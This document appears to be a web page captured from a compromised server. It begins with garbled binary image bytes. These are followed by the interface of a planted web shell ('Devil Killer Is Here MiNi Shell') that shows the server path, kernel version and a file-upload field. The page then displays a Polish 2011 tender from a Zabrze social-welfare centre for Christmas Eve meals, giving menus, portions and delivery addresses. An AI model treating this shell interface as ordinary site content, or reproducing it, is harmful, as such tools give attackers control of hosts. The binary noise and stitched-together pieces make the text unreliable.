JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111124/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111124/307697-N-2011.html

<p class="kh_header"><b>Zabrze: Zorganizowanie posiłku wigilijnego na potrzeby klientów Miejskiego Ośrodka Pomocy Rodzinie w Zabrzu</b><br>
<b>Numer ogłoszenia: 307697 - 2011; data zamieszczenia: 24.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie , ul. Roosevelta 40, 41-800 Zabrze, woj. śląskie, tel. 032 2777800, faks 032 2777802.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopr.zabrze.magistrat.pl, www.mopr.zabrze.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.mopr.zabrze.magistrat.pl, www.mopr.zabrze.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie posiłku wigilijnego na potrzeby klientów Miejskiego Ośrodka Pomocy Rodzinie w Zabrzu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zorganizowanie posiłku wigilijnego na potrzeby klientów Miejskiego Ośrodka Pomocy Rodzinie w Zabrzu w podziale na dwie części, 
w tym:
Część I -  Zorganizowanie posiłku wigilijnego dla klientów MOPR w lokalu restauracyjnym na terenie miasta Zabrze;
Część II - Przygotowanie i dostarczenie gotowych posiłków wigilijnych do świetlic środowiskowych MOPR, Domu Noclegowego i Środowiskowego Domu Samopomocy zlokalizowanych na terenie miasta Zabrze.
CPV: 55320000 - 9 - Usługi podawania posiłków
   55321000 - 6 - Usługi przygotowywania posiłków 
Szczegółowy opis przedmiotu zamówienia:
Część I 
Przedmiotem zamówienia jest przygotowanie i podanie minimum 66, maksimum 70 posiłków wigilijnych dla klientów MOPR w lokalu restauracyjnym Wykonawcy znajdującym się na terenie miasta Zabrze - dzielnica Centrum, w dniu 23.12.2011 r. w godz. od 12.00 do 15.00.
Przez posiłek Zamawiający rozumie podanie każdemu uczestnikowi:
a) śledź w oleju				- ok. 50 g/ osobę
b) barszcz z uszkami				- ok. 250 g + 50 g/ osobę
c) karp panierowany (smażony)		- ok. 100 g/ osobę
d) inny filet panierowany (smażony)		- ok. 100 g/ osobę
e) kapusta z grochem				- ok. 150 g/ osobę
f) kompot z suszonych owoców		- ok. 200 ml/ osobę
g) makówki					- ok. 100 g/ osobę
h) pieczywo (chleb)				- ok. 100 g/ osobę
i) ziemniaki					- ok. 200 g/ osobę
j) kawa 					- dla ok. 70 osób
k) herbata					- dla ok. 70 osób
i) opłatek
W ramach zamówienia Wykonawca jest zobowiązany do:
- przygotowania i podania posiłków w dzień wskazany przez Zamawiającego tj. 23.12.2011 r. w godz. od 12.00 do 15.00 w lokalu restauracyjnym Wykonawcy zlokalizowanym na terenie miasta Zabrze - dzielnica Centrum;
- świadczenia usług restauracyjnych, wyłącznie przy użyciu produktów spełniających normy jakości produktów spożywczych;
- przestrzegania przepisów prawnych w zakresie przechowywania i przygotowywania artykułów spożywczych (m. in. ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia Dz. U. nr 171 poz. 1125 ze zm.);
- przygotowania stołów w sposób uzgodniony z Zamawiającym tj. udekorowanych ozdobami świątecznymi;
- świadczenia usług restauracyjnych na zastawie ceramicznej lub porcelanowej, z użyciem sztućców platerowych, serwetek papierowych lub materiałowych oraz obrusów materiałowych;
- estetycznego podawania posiłków;
Ilość i wielkość zamawianych posiłków wskazana w SIWZ stanowi maksymalny zakres umowy. Zamawiający zastrzega sobie możliwość zamówienia mniejszej ilości posiłków, niż maksymalny zakres umowy (minimum 66 posiłków, maksimum 70 posiłków), a w takiej sytuacji Wykonawca nie będzie wnosił żadnych roszczeń z tego tytułu, w szczególności 
o zapłatę za  ilość stanowiącą różnicę między maksymalnym zakresem umowy, 
a ilością zleconą przez Zamawiającego i rzeczywiście zrealizowaną przez Wykonawcę. Rozliczenie nastąpi zgodnie z rzeczywistym wykonaniem przedmiotu umowy, ale w zakresie wskazanych limitów.
Posiłek powinien odpowiadać wszelkim normom odżywczym obowiązującym w punktach zbiorowego żywienia. Nie dopuszcza się możliwości serwowania jako posiłku wigilijnego gotowych dań typu fast food oraz gotowych sproszkowanych zup. Posiłek ma formę obiadu wigilijnego. Potrawy muszą być świeże i dobrej jakości. Cena posiłków powinna obejmować m.in. koszt surowców, przygotowania posiłków, obsługi, dekoracji.
Wykonawca wystawi fakturę VAT w terminie 3 dni od daty zakończenia realizacji umowy. Należność płatna będzie przelewem na wskazane konto w ciągu 5 dni licząc od dnia otrzymania faktury po jej pozytywnym zweryfikowaniu.

Część II 
Przedmiotem zamówienia jest przygotowanie i dostarczenie własnym transportem 
i na własny koszt łącznie minimum 170 posiłków, maksimum 182 posiłków wigilijnych do świetlic środowiskowych MOPR, Domu Noclegowego i Środowiskowego Domu Samopomocy zlokalizowanych na terenie miasta Zabrze, w tym:
A) Wykonawca zobowiązany jest przygotować i dostarczyć do świetlic własnym transportem i na własny koszt minimum 100 posiłków, maksimum 112 posiłków w godzinach od 10.00 do 12.00 dnia 23.12.2011 r. dla dzieci ze świetlic środowiskowych MOPR mieszczących się w:
- ul. Kasprowicza 7		- 30 posiłków
- ul. Tarnopolska 57		- 20 posiłków
- ul. Wyzwolenia 7		- 30 posiłków
- ul. Roosevelta 40		- 20 posiłków
- ul. Andersa 34			- 18 posiłków
- ul. Dworcowa 8a		- 4 posiłki
Realizację zamówienia należy zacząć od świetlicy środowiskowej MOPR mieszczącej się przy ul. Kasprowicza 7. 
Przez posiłek Zamawiający rozumie:
a) barszcz z uszkami				- ok. 250 g + 50 g/ osobę
b) pierogi ruskie				- ok. 200 g/ osobę
c) filet panierowany (smażony)		- ok. 100 g/ osobę
d) kapusta z grzybami				- ok. 200 g/ osobę
f) kompot (nie z suszonych owoców) 	- ok. 150 ml/ osobę
i) opłatek
B) Wykonawca zobowiązany jest do przygotowania i dostarczenia własnym transportem i na własny koszt 20 posiłków do Środowiskowego Domu Samopomocy ul. Andersa 34, dnia 22.12.2011 r. o godz. 9.00.
Przez posiłek Zamawiający rozumie:
a) śledź w oleju				- ok. 150 g/ osobę
b) barszcz z uszkami				- ok. 250 g + 50 g/ osobę
c) karp panierowany (smażony)		- ok. 100 g/ osobę
d) inny filet panierowany (smażony)		- ok. 100 g/ osobę
e) kapusta z grochem 			- ok. 150 g/ osobę
f) kompot z suszonych owoców		- ok. 200 ml/ osobę
i) makówki					- ok. 100 g/ osobę
j) sernik i/lub makowiec			- ok. 300 g/ osobę
k) opłatek
C) Wykonawca zobowiązany jest do przygotowania i dostarczania własnym transportem i na własny koszt 50 posiłków do Domu Noclegowego, ul. Trocera 63 dnia 24.12.2011 r. do godziny 12.00.
Przez posiłek Zamawiający rozumie:
a) śledź w oleju				- ok. 200 g/ osobę
b) barszcz z uszkami				- ok. 250 g + 75 g/ osobę
c) karp panierowany (smażony)		- ok. 200 g/ osobę
d) inny filet panierowany (smażony)		- ok. 200 g/ osobę
e) kapusta z grochem 			- ok. 150 g/ osobę
f) kompot z suszonych owoców		- ok. 200 ml/ osobę
g) pierogi ruskie				- ok. 200 g/ osobę
h) łazanki					- ok. 200 g/ osobę
i) makówki					- ok. 200 g/ osobę
j) opłatek
Cena posiłków powinna obejmować koszt surowców, przygotowania posiłków, opakowanie oraz transport.
Posiłek powinien odpowiadać wszelkim normom odżywczym obowiązującym w punktach zbiorowego żywienia. Nie dopuszcza się możliwości serwowania jako obiadu gotowych dań typu fast food oraz gotowych sproszkowanych zup. Posiłek ma formę obiadu wigilijnego. Potrawy muszą być świeże i dobrej jakości.
Wykonawca musi posiadać możliwość dowiezienia ciepłych posiłków do miejsc wykazanych powyżej. Posiłki należy dostarczyć w naczyniach szczelnie zamykanych, utrzymujących temperaturę, nie mogą być to pojemniki jednorazowe (opakowania plastikowe lub styropianowe). Naczynia, w których zostaną dostarczone posiłki należy odebrać do dnia 29.12.2011 r.
W ramach zamówienia Wykonawca jest zobowiązany do:
- dostarczania posiłków na w/w miejsca, w dzień wskazany przez Zamawiającego 
tj. 23.12.2011 r. dla Świetlic środowiskowych MOPR, 22.12.2011 r.  Środowiskowego Domu Samopomocy, 24.12.2011 r. dla Domu Noclegowego. 
- świadczenia usług cateringowych, wyłącznie przy użyciu produktów spełniających normy jakości produktów spożywczych;
- przestrzegania przepisów prawnych w zakresie przechowywania i przygotowywania artykułów spożywczych (m. in. ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia Dz. U. nr 171 poz. 1125 ze zm.);
Wykonawca wystawi fakturę VAT w terminie 3 dni od daty zakończenia realizacji umowy. Należność płatna będzie przelewem na wskazane konto w ciągu 5 dni licząc od dnia otrzymania faktury po jej pozytywnym zweryfikowaniu.
Warunkiem udziału w postępowaniu jest spełnienie warunków zawartych w SIWZ oraz art. 22 ust. 1 ustawy Pzp..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.32.00.00-9, 55.32.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Parafowany wzór umowy, pełnomocnictwo rodzajowe</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>- zmiana osób funkcyjnych - z przyczyn niezależnych od Zamawiającego i Wykonawcy,
- zmiana sposobu reprezentacji - z przyczyn niezależnych od Zamawiającego i Wykonawcy,
- zmiana adresu siedziby jednej ze stron - z przyczyn zewnętrznych,
- wprowadzenie lub zmiana podwykonawcy - w uzasadnionych przypadkach, za pisemną zgodą Zamawiającego,
- zmiana ilości zamawianych posiłków - z przyczyn niezależnych od Zamawiającego,
- zmiana jadłospisu,
- zmiana miejsca dostawy i terminu dostawy,
- zmiana miejsca realizacji lokalu restauracyjnego o takim samym lub wyższym standardzie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopr.zabrze.pl www.mopr.zabrze.magistrat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Rodzinie w Zabrzu ul. Roosevelta 40 41-800 Zabrze Pokój nr 216-II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.12.2011 godzina 09:00, miejsce: Miejski Ośrodek Pomocy Rodzinie w Zabrzu ul. Roosevelta 40 41-800 Zabrze Pokój nr 117-I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie posiłku wigilijnego dla klientów MOPR w lokalu restauracyjnym na terenie miasta Zabrze - dzielnica Centrum.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przygotowanie i podanie minimum 66, maksimum 70 posiłków wigilijnych dla klientów MOPR w lokalu restauracyjnym Wykonawcy znajdującym się na terenie miasta Zabrze - dzielnica Centrum, w dniu 23.12.2011 r. w godz. od 12.00 do 15.00.
Przez posiłek Zamawiający rozumie podanie każdemu uczestnikowi:
a) śledź w oleju				- ok. 50 g/ osobę
b) barszcz z uszkami				- ok. 250 g + 50 g/ osobę
c) karp panierowany (smażony)		- ok. 100 g/ osobę
d) inny filet panierowany (smażony)		- ok. 100 g/ osobę
e) kapusta z grochem				- ok. 150 g/ osobę
f) kompot z suszonych owoców		- ok. 200 ml/ osobę
g) makówki					- ok. 100 g/ osobę
h) pieczywo (chleb)				- ok. 100 g/ osobę
i) ziemniaki					- ok. 200 g/ osobę
j) kawa 					- dla ok. 70 osób
k) herbata					- dla ok. 70 osób
i) opłatek
W ramach zamówienia Wykonawca jest zobowiązany do:
- przygotowania i podania posiłków w dzień wskazany przez Zamawiającego tj. 23.12.2011 r. w godz. od 12.00 do 15.00 w lokalu restauracyjnym Wykonawcy zlokalizowanym na terenie miasta Zabrze - dzielnica Centrum;
- świadczenia usług restauracyjnych, wyłącznie przy użyciu produktów spełniających normy jakości produktów spożywczych;
- przestrzegania przepisów prawnych w zakresie przechowywania i przygotowywania artykułów spożywczych (m. in. ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia Dz. U. nr 171 poz. 1125 ze zm.);
- przygotowania stołów w sposób uzgodniony z Zamawiającym tj. udekorowanych ozdobami świątecznymi;
- świadczenia usług restauracyjnych na zastawie ceramicznej lub porcelanowej, z użyciem sztućców platerowych, serwetek papierowych lub materiałowych oraz obrusów materiałowych;
- estetycznego podawania posiłków;
Ilość i wielkość zamawianych posiłków wskazana w SIWZ stanowi maksymalny zakres umowy. Zamawiający zastrzega sobie możliwość zamówienia mniejszej ilości posiłków, niż maksymalny zakres umowy (minimum 66 posiłków, maksimum 70 posiłków), a w takiej sytuacji Wykonawca nie będzie wnosił żadnych roszczeń z tego tytułu, w szczególności 
o zapłatę za  ilość stanowiącą różnicę między maksymalnym zakresem umowy, 
a ilością zleconą przez Zamawiającego i rzeczywiście zrealizowaną przez Wykonawcę. Rozliczenie nastąpi zgodnie z rzeczywistym wykonaniem przedmiotu umowy, ale w zakresie wskazanych limitów.
Posiłek powinien odpowiadać wszelkim normom odżywczym obowiązującym w punktach zbiorowego żywienia. Nie dopuszcza się możliwości serwowania jako posiłku wigilijnego gotowych dań typu fast food oraz gotowych sproszkowanych zup. Posiłek ma formę obiadu wigilijnego. Potrawy muszą być świeże i dobrej jakości. Cena posiłków powinna obejmować m.in. koszt surowców, przygotowania posiłków, obsługi, dekoracji.
Wykonawca wystawi fakturę VAT w terminie 3 dni od daty zakończenia realizacji umowy. Należność płatna będzie przelewem na wskazane konto w ciągu 5 dni licząc od dnia otrzymania faktury po jej pozytywnym zweryfikowaniu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.00.00-9, 55.32.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przygotowanie i dostarczenie gotowych posiłków wigilijnych dla świetlic środowiskowych MOPR, Domu Noclegowego i Środowiskowego Domu Samopomocy zlokalizowanych na terenie miasta Zabrze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przygotowanie i dostarczenie własnym transportem 
i na własny koszt łącznie minimum 170 posiłków, maksimum 182 posiłków wigilijnych do świetlic środowiskowych MOPR, Domu Noclegowego i Środowiskowego Domu Samopomocy zlokalizowanych na terenie miasta Zabrze, w tym:
A) Wykonawca zobowiązany jest przygotować i dostarczyć do świetlic własnym transportem i na własny koszt minimum 100 posiłków, maksimum 112 posiłków w godzinach od 10.00 do 12.00 dnia 23.12.2011 r. dla dzieci ze świetlic środowiskowych MOPR mieszczących się w:
- ul. Kasprowicza 7		- 30 posiłków
- ul. Tarnopolska 57		- 20 posiłków
- ul. Wyzwolenia 7		- 30 posiłków
- ul. Roosevelta 40		- 20 posiłków
- ul. Andersa 34			- 18 posiłków
- ul. Dworcowa 8a		- 4 posiłki
Realizację zamówienia należy zacząć od świetlicy środowiskowej MOPR mieszczącej się przy ul. Kasprowicza 7. 
Przez posiłek Zamawiający rozumie:
a) barszcz z uszkami				- ok. 250 g + 50 g/ osobę
b) pierogi ruskie				- ok. 200 g/ osobę
c) filet panierowany (smażony)		- ok. 100 g/ osobę
d) kapusta z grzybami				- ok. 200 g/ osobę
f) kompot (nie z suszonych owoców) 	- ok. 150 ml/ osobę
i) opłatek
B) Wykonawca zobowiązany jest do przygotowania i dostarczenia własnym transportem i na własny koszt 20 posiłków do Środowiskowego Domu Samopomocy ul. Andersa 34, dnia 22.12.2011 r. o godz. 9.00.
Przez posiłek Zamawiający rozumie:
a) śledź w oleju				- ok. 150 g/ osobę
b) barszcz z uszkami				- ok. 250 g + 50 g/ osobę
c) karp panierowany (smażony)		- ok. 100 g/ osobę
d) inny filet panierowany (smażony)		- ok. 100 g/ osobę
e) kapusta z grochem 			- ok. 150 g/ osobę
f) kompot z suszonych owoców		- ok. 200 ml/ osobę
i) makówki					- ok. 100 g/ osobę
j) sernik i/lub makowiec			- ok. 300 g/ osobę
k) opłatek
C) Wykonawca zobowiązany jest do przygotowania i dostarczania własnym transportem i na własny koszt 50 posiłków do Domu Noclegowego, ul. Trocera 63 dnia 24.12.2011 r. do godziny 12.00.
